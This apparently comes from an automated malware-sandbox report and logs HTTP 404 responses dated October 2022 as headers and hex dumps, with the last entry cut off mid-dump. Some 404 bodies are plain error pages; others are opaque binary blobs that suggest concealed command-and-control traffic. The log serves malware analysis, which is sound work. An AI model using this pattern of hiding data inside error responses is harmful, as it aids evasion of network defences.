Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gVzVkIdvGHsVsbVyl9qAqELjnheZhBTdilA%2FYBYYtREmG4AyMm4OPYAxgHFpqQapv5gTS9596QNG3zC6tPloLNgs8wbYWc4crSz5o%2B4h5M906%2Bs3BtDtaZekkH6EH5fupw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c4fabd6775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jf8tuzyNHiGxIa0zvNaFROwVGFGkC4p2vORRtZV0p2ZOe0B1kIYqrEM0kvT7CeOTEV1qoMR%2BEf0nMkgAuYg24NYAWaYTLi85XF774%2BdgXwTaJ92PdTrQ36d5TElqeKgC2A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c506d58775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 64 63 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 f3 dd 04 32 ea 42 12 5b 46 12 e9 97 9a 81 35 54 01 13 96 75 50 bf d8 5d 92 a7 0a d6 30 71 33 94 a3 7c f7 e2 3e 59 57 e3 c6 68 c5 9b 3b 73 51 59 64 64 b8 d8 f9 20 3d 8f 58 93 e0 7a bb f8 db e4 63 48 c7 01 a0 b0 4d f2 16 85 c5 fc 90 13 19 77 bf 6c 13 d9 7b 64 58 ed 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 40 ab d1 74 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e c1 f6 ff 78 ff 5e db c4 0d 13 13 3f 68 e1 92 24 18 4f c5 03 01 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 2a f8 96 be 21 51 61 1a 06 32 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 5b 7a e5 0e f4 eb 7e 71 eb b0 fe 1a 20 58 4b d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 27 b9 52 e0 cc 23 82 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 43 9d cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 9f 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 23 e9 de 8e 82 11 e8 e4 1f da a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 f4 94 8c 1f d4 fc 69 91 9c 4b 0f f1 2c d6 af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 84 7a 8a 8b e1 52 71 d7 9c 4c c2 e0 2b 43 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a2 bc 5b 6f e3 e3 1c 35 02 f5 52 48 c4 37 96 4d ef e7 17 3f 72 e9 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6c 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 Data Ascii: 4dc`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*2B[F5TuP]0q3|>YWh;sQYdd =XzcHMwl{dX3Ob>!ZC:>@tSSP*{~x^?h$Oa~i~]DzN,*!Qa2|(kJk
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kdrk%2BI3TPzzBSGru%2FZEBLzbK6IgPFNf7GuUwJsCxPOzjgxe54ZHXJixzmEotD9trkIwKBrHM02OlQ4YtgVuES87UGuDnAAjYSLb5F282Yh7iSD1e3epB5Pac2behNs%2FXZw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c5b3aa7775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CPdcGF13lhzY81sJOmlQQo9XpKs43HfMQcJl4zhOPMgh1M39btdzSClGR9q35TZZMfB41g32XuN4asjL9EB9HYKs0aXOk9tRL87VTP9fzSINEHLMszfR8NQu0DrSDC09ww%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c5c0c08775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 35 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 49 c0 5f 80 07 8a b8 57 f7 67 a4 78 0a 4a 79 f5 7e 01 0d 0a Data Ascii: 25Uys/~(`:I_WgxJy~
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1Uzncdx4UMuhhUiRX5VkaPAAPefJwrVL%2FeEUCMxcP28gJiPeZ2n1M8%2FpL5rgZ46yx%2B47aHj56DDb3aCHXRuSJ3wnzMfkdrtwFzgPn5gieoDAL2le%2Bd49cLsNgwDjAEQrwQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c639b89775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qMvBT1UAbtskSjA7MFZ%2BYE11ESQPWfYbRHugTjF1DQ4quWuCnsXZggfTxhgw7%2FFuC%2BTRhR9asexvZr%2BjbCNLDhMeuEnKYi96u9IXpaAcvYdQjs1XJTje%2F%2FP95UANk09ahw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c65af4d775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oG%2Fvt0bxAC7zNxZx6Tvp2jebR7Lx4OE77NKgStoJpZ5S%2BhUwOQ1tVRHVsh4x7UDYmlcfGs4ZZ7ufMqX%2BbzdmFgQd1ITGUQfhyOSAG798vGKcJQ7hcD1esJYh5ZO%2BobdZQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c6719c5775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 66 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c c2 48 9f 00 81 b8 51 f5 7a bf 7b 14 0c 78 f9 68 10 61 9e 4b 26 08 72 9f a8 9c b9 0d 0a Data Ascii: 2fUys/~(`:LHQz{xhaK&r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yksv3kmO87MHRsnm6qb2P%2FM4BWUhSUWtLt9yuq3UkenKr3%2FkCQGyMnUCW6wSU%2F9Exi0OdFydm8XkeuIXNt0CfIv%2FL8Gu8bl%2Fb4W%2FYZbnjOnIqi1aK%2FRy3TtrJg3qmCT9wg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979ca98ae8775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1McjKsnOP64XZW%2FaK815GI%2Bd7iETRdqkCVB5Hc7fmNJFIJBfIUOSjBrdAAjlWHxzdqFCh9wcTXNyOo5wji4vfzA7b0kyOZNiwfilmJoT%2FmJDm76lVaKIILIbtiLQZzbeMQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979caa3c17775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 38 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 9e 1a d9 1a d7 ff 17 a2 2e f6 2d 42 17 34 ff 6b 4b 62 85 54 2c 18 36 c1 a8 cb ac d7 75 95 37 79 16 35 ff b7 0d 0a Data Ascii: 38Uys/~(u:R.-B4kKbT,6u7y5
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pq6Btvyo1ee%2BHZETKf8WUAyPyn3f0kfeSa25s7qlehqQY5ud70qgbDxt5f8vSvUS4CTLOAaSAZKXEq129Ummib8XDsf2bQhw0PrT8nq4eG0U3OIKP5lP3H%2BR5%2BFh6hwWLA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cc56b28775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rz2LTai8UoAyqlyruCRtQGdY9up19CNKLF5S5NFKHRugOi5WsKByxB8qrkS25bTNNXVFtqpsyq%2B6Ms%2BXZKAOvKyj4BmcoCmjetzdqjsJqeJKWkJ76T%2FdwICajcKGKaAgkg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cc69d9a775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 85 14 dd 51 d5 ff 13 b1 67 f2 25 48 16 22 e0 6a 0b 65 88 17 0a 03 6b de a0 81 8f d0 30 d1 76 64 5d 28 e2 0d 0a Data Ascii: 37Uys/~(u:RQg%H"jek0vd](
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7Lie5HcEy528iAEIfjSq7UEkR1uOq33iV1dhBmypT4oeG%2FuFqleVSPjN%2Bwnz1VEfiiKr4aFCqQcXTVfu5Zv7dbQzLTg0HCdEAlEmkPcWAzmT80M1JjrnZ%2Fo4owooz2mNgw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cd1d8930716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U1UwcdvmLUwlRPNHiN5fkoiihnZR1cj%2F7WRWSEGdZd3stWfUmXPyskjQw1nc1FCqVovKunECdL7lRkqLk%2FDniPvc%2FAHs3NHJPI7A7Zh28sZoJpJj%2F8UGRCPl6XJmg8NNJg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cd36a780716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 38 33 30 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 f3 dd 04 1a ea 42 12 73 46 12 e9 bf 9a 81 35 7c 01 13 96 5d 50 bf d8 75 92 a7 0a fe 30 71 33 bc a3 7c f7 ca 3e 59 57 cb c6 68 c5 b3 3b 73 51 71 64 64 b8 f0 ff 20 3d a7 58 93 e0 52 bb f8 db cc 63 48 c7 29 a0 b0 4d da 16 85 c5 d4 90 13 19 5f bf 6c 